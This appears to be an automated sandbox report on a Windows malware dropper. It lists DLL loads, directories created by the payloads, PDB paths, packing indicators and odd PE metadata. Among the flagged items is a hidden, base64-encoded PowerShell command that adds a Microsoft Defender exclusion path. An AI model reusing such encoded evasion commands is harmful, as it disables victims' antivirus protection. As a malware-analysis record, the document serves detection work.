                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netapi32.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: taskschd.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: xmllite.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: napinsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: pnrpnsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: wshbth.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: nlaapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: winrnr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeSection loaded: samlib.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: apphelp.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: webio.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: dpapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: kernel.appcore.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: wbemcomn.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: amsi.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: userenv.dll
                    Source: C:\Program Files\Windows Media Player\graph\graph.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: winmm.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: wininet.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: rstrtmgr.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Google\Chrome\Extensions
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\graph
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\graph\graph.exe
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
                    Source: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exeDirectory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
                    Source: cMTqzvmx9u.exeStatic file information: File size 3238912 > 1048576
                    Source: cMTqzvmx9u.exeStatic PE information: Raw size of qbaikvfg is bigger than: 0x100000 < 0x2aac00
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp
                    Source: Binary string: .pdbyy: source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp
                    Source: Binary string: C:\Admin\Workspace\1766103906\Project\Release\Project.pdb source: ba944ca4ff.exe, 0000000F.00000000.2277534376.0000000000F2C000.00000002.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: 68f6adf5d5.exe, 00000018.00000003.2537949990.0000017A8C7E7000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000001C.00000000.2538575063.00007FF740999000.00000002.00000001.01000000.00000016.sdmp, graph.exe, 0000001E.00000000.2689593141.00007FF740999000.00000002.00000001.01000000.00000016.sdmp

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\cMTqzvmx9u.exeUnpacked PE file: 0.2.cMTqzvmx9u.exe.b00000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 2.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeUnpacked PE file: 3.2.skotes.exe.bd0000.0.unpack :EW;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;qbaikvfg:EW;scclittj:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exeUnpacked PE file: 9.2.7620ab885d.exe.fd0000.0.unpack :EW;.rsrc :W;.idata :W;ibdqnddj:EW;izikvcoa:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;ibdqnddj:EW;izikvcoa:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exeUnpacked PE file: 10.2.8469cb4d4d.exe.740000.0.unpack :EW;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;wekcazbo:EW;ttllozcv:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exeUnpacked PE file: 27.2.b285303eae.exe.b0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;aseoxclk:EW;dunhoeap:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;aseoxclk:EW;dunhoeap:EW;.taggant:EW;
                    Source: C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exeUnpacked PE file: 46.2.96e283ac77.exe.350000.0.unpack :EW;.rsrc:W;.idata :W;rqcwpexm:EW;viefdblt:EW;.taggant:EW; vs :ER;.rsrc:W;
                    Suspicious powershell command line found
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=
                    Source: DJj.exe.11.drStatic PE information: 0xD22848DC [Tue Sep 23 12:17:32 2081 UTC]
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                    Source: random[1].exe1.5.drStatic PE information: real checksum: 0x2d1643 should be: 0x2db872
